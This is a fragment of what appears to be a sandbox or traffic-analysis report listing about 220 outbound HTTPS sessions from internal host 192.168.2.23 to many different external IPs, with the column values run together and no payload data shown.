                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13267192.168.2.233745080.66.47.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13268192.168.2.236058866.85.255.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13269192.168.2.2345908147.97.35.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13270192.168.2.2334426113.40.191.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13271192.168.2.2340260192.98.54.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13272192.168.2.2352510116.109.37.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13273192.168.2.236080819.41.152.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13274192.168.2.2333082218.199.186.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13275192.168.2.2343092179.191.26.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13276192.168.2.2351788197.108.2.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13277192.168.2.235347863.33.217.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13278192.168.2.2338066118.115.166.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13279192.168.2.2339368162.242.192.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13280192.168.2.234101831.18.30.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13281192.168.2.233920425.26.95.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13282192.168.2.2358590205.37.134.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13283192.168.2.2357368124.45.169.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13284192.168.2.235834820.208.17.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13285192.168.2.2344280113.69.150.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13286192.168.2.23450561.181.146.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13287192.168.2.2359162198.233.33.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13288192.168.2.23352741.165.188.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13289192.168.2.233389818.123.94.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13290192.168.2.2350704151.124.136.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13291192.168.2.235492013.173.152.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13292192.168.2.234089440.60.220.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13293192.168.2.2344122202.23.91.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13294192.168.2.2357336174.65.156.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13295192.168.2.234594240.179.199.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13296192.168.2.235122251.35.59.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13297192.168.2.234064080.213.166.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13298192.168.2.2349872115.229.243.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13299192.168.2.233976286.67.195.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13300192.168.2.235529031.199.40.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13301192.168.2.235935074.188.43.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13302192.168.2.234784061.213.193.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13303192.168.2.233657665.71.141.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13304192.168.2.2358746183.128.101.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13305192.168.2.2345456166.141.109.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13306192.168.2.2352848100.209.80.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13307192.168.2.2341094155.113.67.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13308192.168.2.235861496.213.170.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13309192.168.2.234032286.85.177.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13310192.168.2.2341736118.216.74.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13311192.168.2.2345544216.11.4.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13312192.168.2.234305624.58.37.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13313192.168.2.2357436207.101.145.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13314192.168.2.2345778142.11.41.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13315192.168.2.234291042.141.143.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13316192.168.2.235641495.73.152.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13317192.168.2.235721651.69.74.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13318192.168.2.2345882205.72.219.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13319192.168.2.2342024204.90.133.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13320192.168.2.23498981.65.216.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13321192.168.2.23390521.187.172.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13322192.168.2.235249649.39.35.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13323192.168.2.2348444101.137.49.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13324192.168.2.234263895.122.230.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13325192.168.2.2351038179.212.210.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13326192.168.2.2345018213.223.37.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13327192.168.2.234836899.202.244.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13328192.168.2.234201679.193.94.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13329192.168.2.2337958196.72.182.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13330192.168.2.2349570167.124.133.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13331192.168.2.233421857.52.3.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13332192.168.2.2357674153.7.151.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13333192.168.2.235371672.142.47.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13334192.168.2.2343818159.242.182.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13335192.168.2.2351776109.149.205.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13336192.168.2.2356428113.34.230.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13337192.168.2.234656667.112.6.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13338192.168.2.2334864126.135.150.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13339192.168.2.2337966174.143.58.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13340192.168.2.2346184165.51.216.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13341192.168.2.2333130101.177.70.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13342192.168.2.2343166135.192.225.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13343192.168.2.23436725.116.189.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13344192.168.2.235947487.228.216.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13345192.168.2.2353342120.136.112.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13346192.168.2.2339828173.144.133.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13347192.168.2.2346020192.186.48.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13348192.168.2.234485886.32.19.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13349192.168.2.233449425.202.89.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13350192.168.2.234808897.255.39.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13351192.168.2.233649635.251.208.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13352192.168.2.234125492.40.13.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13353192.168.2.2352376164.219.176.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13354192.168.2.2342900156.220.112.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13355192.168.2.235974617.10.222.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13356192.168.2.233625062.1.242.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13357192.168.2.2333706184.41.175.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13358192.168.2.2342222182.110.4.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13359192.168.2.235715275.15.50.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13360192.168.2.2333908184.22.85.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13361192.168.2.234273465.112.147.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13362192.168.2.233740040.37.183.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13363192.168.2.233537275.157.10.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13364192.168.2.2347586154.72.79.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13365192.168.2.233667462.0.202.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13366192.168.2.234132834.175.195.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13367192.168.2.2346532110.212.63.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13368192.168.2.2346544192.7.56.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13369192.168.2.235421260.8.5.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13370192.168.2.2352548157.94.96.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13371192.168.2.233397240.102.246.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13372192.168.2.2346738131.0.172.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13373192.168.2.235479677.174.69.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13374192.168.2.2349150219.142.228.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13375192.168.2.235936283.157.234.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13376192.168.2.2342740190.234.19.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13377192.168.2.2338684140.3.116.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13378192.168.2.2342532110.236.35.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13379192.168.2.2334040118.91.147.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13380192.168.2.2359770219.117.64.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13381192.168.2.235686246.13.247.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13382192.168.2.2356934104.123.75.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13383192.168.2.2357210199.148.121.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13384192.168.2.234580836.199.109.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13385192.168.2.2356686192.206.126.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13386192.168.2.2340966195.79.254.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13387192.168.2.2347018163.66.54.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13388192.168.2.2359038108.67.201.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13389192.168.2.234554632.242.183.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13390192.168.2.2348706104.77.192.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13391192.168.2.2349390206.15.84.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13392192.168.2.2353104157.24.67.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13393192.168.2.2351838193.210.71.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13394192.168.2.2354898149.231.88.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13395192.168.2.236026024.239.198.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13396192.168.2.235378263.63.52.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13397192.168.2.2337564184.185.1.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13398192.168.2.23541929.26.28.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13399192.168.2.2338976201.254.141.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13400192.168.2.233610447.31.154.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13401192.168.2.2335694116.184.162.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13402192.168.2.2353148184.17.69.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13403192.168.2.2355548100.142.170.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13404192.168.2.234160043.139.139.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13405192.168.2.2345246101.99.142.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13406192.168.2.236018027.181.75.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13407192.168.2.2336886168.100.112.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13408192.168.2.235857491.59.49.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13409192.168.2.235640868.176.82.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13410192.168.2.2343128184.21.229.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13411192.168.2.2345476121.229.92.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13412192.168.2.2346792223.230.197.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13413192.168.2.235723058.87.158.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13414192.168.2.234944025.39.210.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13415192.168.2.235519845.94.36.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13416192.168.2.2347426117.36.198.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13417192.168.2.234955072.117.176.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13418192.168.2.234510078.187.243.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13419192.168.2.235976632.125.77.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13420192.168.2.2360264204.182.216.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13421192.168.2.2350904187.10.154.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13422192.168.2.2339570168.46.232.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13423192.168.2.234781480.101.207.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13424192.168.2.23360569.203.238.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13425192.168.2.234074888.165.110.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13426192.168.2.2352470179.98.160.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13427192.168.2.235427894.124.193.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13428192.168.2.2335220138.147.218.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13429192.168.2.235587690.87.57.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13430192.168.2.2341390192.52.90.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13431192.168.2.234800877.130.202.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13432192.168.2.234974667.16.134.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13433192.168.2.2333674187.70.226.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13434192.168.2.234094419.198.110.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13435192.168.2.2359938168.146.19.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13436192.168.2.2336528194.75.69.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13437192.168.2.233558837.229.178.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13438192.168.2.2334774210.0.54.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13439192.168.2.235835219.150.135.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13440192.168.2.2338690216.166.201.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13441192.168.2.2358950120.61.171.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13442192.168.2.233399047.47.88.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13443192.168.2.2333252212.99.57.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13444192.168.2.2357550165.11.188.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13445192.168.2.2337972213.178.56.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13446192.168.2.233303464.145.104.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13447192.168.2.2358336176.5.174.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13448192.168.2.2359508126.66.252.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13449192.168.2.2360816192.106.153.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13450192.168.2.235005623.3.217.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13451192.168.2.2343876125.206.24.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13452192.168.2.2355548157.187.219.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13453192.168.2.235790850.48.252.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13454192.168.2.235988275.169.225.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13455192.168.2.2347930171.121.52.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13456192.168.2.2335440177.131.248.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13457192.168.2.234666445.17.163.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13458192.168.2.233793254.101.77.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13459192.168.2.235936895.136.55.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13460192.168.2.2345236188.109.143.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13461192.168.2.234246653.69.98.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13462192.168.2.2359506103.147.104.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13463192.168.2.234795887.11.179.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13464192.168.2.234665251.149.92.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13465192.168.2.236049844.108.8.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13466192.168.2.235468682.199.190.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13467192.168.2.233816083.101.137.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13468192.168.2.2359418183.120.15.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13469192.168.2.234439832.117.253.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13470192.168.2.23586401.108.222.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13471192.168.2.233318898.90.41.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13472192.168.2.235029669.218.125.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13473192.168.2.2356624199.196.168.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13474192.168.2.2342428146.206.46.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13475192.168.2.234358894.247.107.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13476192.168.2.2357626150.65.92.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13477192.168.2.2360356156.169.60.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13478192.168.2.2360472193.144.251.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13479192.168.2.236014876.242.69.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13480192.168.2.2356842136.207.254.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13481192.168.2.234491862.245.1.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13482192.168.2.235357096.187.78.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13483192.168.2.2340688176.173.202.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13484192.168.2.2352552101.48.214.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13485192.168.2.235706475.245.51.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13486192.168.2.233639650.28.202.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13487192.168.2.235609252.134.83.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13488192.168.2.2342006183.47.130.97443
                                                TimestampBytes transferredDirectionData


